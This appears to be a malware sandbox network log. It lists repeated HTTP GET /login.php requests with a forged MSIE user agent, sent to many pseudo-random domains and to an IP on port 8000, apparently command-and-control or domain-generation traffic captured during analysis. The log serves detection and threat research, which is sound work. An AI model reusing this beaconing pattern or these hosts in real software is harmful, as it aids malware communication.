Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731344868.1489616
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731344868.1489616
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731344868.1489616; parking_session=07951af7-1a60-440f-a856-c66b7de487f9
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=910vr4788904590031611
Source: global traffic, HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
